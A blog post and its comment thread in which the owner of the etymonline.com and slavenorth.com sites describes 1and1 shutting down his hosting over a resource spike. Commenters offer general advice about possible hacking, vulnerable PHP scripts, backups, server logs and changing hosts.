This is pathetic, but does anyone know anything about Web sites? I have been hosting two Web addresses -- etymonline.com and slavenorth.com -- with 1and1.com for a couple of years now. Both are text sites primarily, with a few pictures. They're very basic, but they get a steady flow of traffic. The first is the only really comprehensive free English etymology dictionary on the Internet. The second is the only general overview of black slavery in the Northern colonies and states of the U.S. They get a steady flow of visits from students and researchers. I don't generate income off them; they're there for people to use, and I pick up the tab for domain hosting.
Or they were there. About a month ago I got a notice from 1and1 informing me I was using too much of their bandwidth and demanding I upgrade my account. I figured the sites' popularity had grown past some tipping point. I went through the steps to change my account setting, to charge myself more money, and figured that was that. About a week ago, I got another e-mail from them, informing me that my service was going to be cut off if I did not upgrade my account. I wrote back protesting that I had upgraded the account. I never got an acknowledgment.
Yesterday, I find all my Web sites gone from the Internet and my account locked.
Needless to say, years of research going down the tubes is not a happy experience, nor is fielding inquiries from the many people who rely on these sites.
I want to know what happened, and what they expect me to do to solve this problem, so I can judge whether it is within my capability to do so. But so far no one there has been able to tell me anything in words I understand. I work nights, and I have stayed up half of today (my normal sleeping time) trying to find someone at 1and1 to give me answers. No luck.
This is what I was able to glean from the tech support person at billing: There's "something running in your space that's crashing the server that it's on." It started around November 29. It causes a "spike in resources," which is why they cut off my service.
I have made no significant changes to my Web site in more than a year, certainly nothing on November 29. I don't use the site to do any mailing or anything but offer text for view. Is it possible that some sort of hacker script got into the site, and is using it to generate spam? Does that even make sense? Is that consistent with what they told me? Or have I simply been awake too long?
Is there anyone who can tell me what might be wrong, or suggest some questions I can ask that might yield answers, since none of mine so far has? Or shall I write off these sites as dead?
Any suggestions can be mailed to byronic106@yahoo.com and would be appreciated. For now, I'm going to bed.
Your answers are all hosting company specific. It's possible that your account was cracked and that's what was driving up your usage. But there's no way to tell without going in a looking around for things that you didn't put there, and you can't do that with your account disabled.
If you have backups of your data, you should probably just set up with another hosting company.
If you don't, then you need to get in touch with them - a real, live person on the phone - ASAP to see if they have backups of your data and can supply them to you. Service levels and policies vary widely, so there's no way to know until you try.
Good Luck!
Did your etymonline.com come back on line? I did a google to see the cached version, which came up, then did some alphabet and page number pecking which also brought up the correct pages. It also comes up online when I type in the url.
And slavenorth.com is also up.
Here's hoping you got it resolved. Time to make backups.
BTW, thanks for the additional slavenorth link. I've used the other one for over a year now, so thanks for that, too.
Good morning from the left coast. You can find your sites here too:
http://web.archive.org/web/*/etymonline.com
http://web.archive.org/web/*/slavenorth.com
The most routine of log analysis on the log files on the sites will tell you what has been generating all this traffic, and perhaps why.
Text-heavy sites don't use up traffic, they just don't.
This is odd. I can bring up slavenorth.com by typing it into the browser, but when I used the "dig" utility to find the IP address of slavenorth.com it came up with 82.165.193.29. When I typed this into the browser, I got a 404 page not found error in German.
If you can get access to them you should download a copy of your server logs. This should give you some idea of what is going on. I do not know if your hosting provider gives you the power to access a database or run cgi programs, but if they do you should disable those functions. And change your password ASAP.
An unsolicited unpaid testimonial: I moved recently to Living Dot. Their basic plan is inexpensive and their tech support people are responsive. If you ever want to move to Moveable Type, they are experienced with it.
It sounds to me like your site was cracked. That happened to me a few weeks ago on Christmas Eve. I was sorely miffed and I had to fix everything and delete all their files which they had uploaded.
Perhaps somebody cracked your account and was using it to upload/share cracked files. That does happen sometimes. The only way to know is to FTP into your site, which apparently you can no longer do, and check out the files, as well as check for recently changed files.
UPDATE: Sites seem to be there again, but if so, it is a temporary reprieve. The company gave me some access to the account to try to figure out the problem.
Thanks to those who have written with advice; I haven't had a chance to thank you individually yet.
To work on these sites, especially the dictionary, which requires constant updating and niggling formatting work, I had someone wiser than I set up a system to make changes simply. It involves files with .php extensions. I can do HTML by myself, but this, apparently, is the next generation beyond that. It made my work much easier, but perhaps this is where the vulnerability occurs.
Other problem is, with this system, I no longer seem to have the text of the dictionary on my own computer and wouldn't know how to get it back from the server if I had to.
1and1 wrote to me today and listed the two dozen or so .php files on the site and said:I am going to try to track down the fellow who wrote those codes. He was basically a fan of the site who did the work for free as a gesture of gratitude.
This reminds me to back up my site. Sorry to profit from your misfortune!
I hope someone gave you a direction to head on retrieving the files. If you can ftp your site, as Banagor notes, it should be easy to retrieve all the files.
You might want to check with 1and1 on the method. Firefox has a nice ftp add-on for their browser that works like Windows Explorer after you type in the address, ID and password then connect to the site. When connected, it's just a highlight then drag and drop files routine from the site directory to a directory/folder on your computer.
After that you should have everything you need to restart the site should all be lost for some reason. But don't believe any the above unless someone confirms it. I only know enough to be dangerous.
PHP can be very buggy and has multiple vulnerabilities that can be exploited. This is mainly because PHP is so flexible. Whoever helped you by writing the code should know enough about it to look at the stuff on your site and check to see if there are any security problems on your site. Good luck and hope you get it worked out.
I also use 1and1, and their e-mail servers have been running roughly on only one cylinder on a good day of late, and their webmail server is completely busted. E-mail to tech support hasn't gotten any response.
Not quite sure what's going on over there, but I'm guessing someone went on a rampage through their systems.
Callimachus, Hosting Matters has a variety of low-cost, flexible hosting plans. They also have an easy-to-use graphical interface for non-techies.
However, if your code was vulnerable and got hacked, that will have to be fixed to prevent a repeat.
I don't know how well you know the php guy, but if there is a vulnerability in his script it is possible he put it there for his own use, ie a backdoor. If you don't know him well you might want to have someone else review the code.